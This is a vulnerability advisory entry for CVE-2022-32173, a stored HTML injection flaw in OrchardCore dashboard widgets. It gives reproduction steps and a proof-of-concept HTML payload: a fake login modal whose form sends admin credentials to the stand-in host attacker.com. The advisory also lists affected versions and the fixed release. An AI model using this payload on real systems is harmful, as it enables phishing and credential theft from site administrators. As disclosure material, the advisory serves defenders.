Headline
CVE-2022-32173: Mend Vulnerability Database
In OrchardCore rc1-11259 to v1.2.2 vulnerable to HTML injection, allow an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users.
Overview
In OrchardCore rc1-11259 to v1.2.2 vulnerable to HTML injection, allow an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users.
Details
Once an admin access the dashboard, the injected modal dialog will be presented (preventing access to any other element on the page) and wait for an input, once submitted - the admin will be redirected to a malicious host and the attacker will receive the confidential data (user’s credentials for instance)
PoC Details
1. Log in as an admin, navigate to security roles, and then edit the “Editor” role.
2. Then, enable the “Manage the Admin Dashboard” privilege.
3. Create a user with an “Editor” role and logout.
4. Login with the new user.
5. Once logged in, navigate to the Admin’s page (“/Admin” route).
6. Press on “Manage Dashboard” and edit a certain Widget (with an HTML editing capabilities).
7. Press on “<>” and add the following HTML code (There is a code section)
8. Click on “Publish”.
Yow will see that you are brought into the “/Admin” page, and cannot press on any other element. Type in non-confidential data, and press on “Login”. You will see that you are redirected into the attacker site. Also the credentials are sent to him.
9. Now, let’s login as an admin (since you can’t logout, route to “/login”).
10. Navigate to the Admin’s page (“/Admin” route). You will see the Modal dialog appear.
PoC Code
<div class="modal show d-block">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h3 class="page-title">Please Log In</h3>
</div>
<div class="modal-body">
<form class="new-wiki-page" action="http://attacker.com/">
<div class="form-group">
<label for="username"><span>Username</span></label>
<input type="text" name="username" id="username" class="form-control">
<label for="password"><span>Password</span></label>
<input type="password" name="password" id="password" class="form-control">
</div>
<div class="form-actions"><button name="button" type="submit" class="btn btn-success">Login</button></div>
</form>
</div>
</div>
</div>
</div>
Affected Environments
OrchardCore versions rc1-11259 through v1.2.2
Prevention
Upgrade to OrchardCore version v1.4.0
Related news
OrchardCore versions starting with 1.0.0-rc1-11259 and prior to 1.4.0 are vulnerable to HTML injection. The vulnerability allows an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users. Version 1.4.0 contains a patch.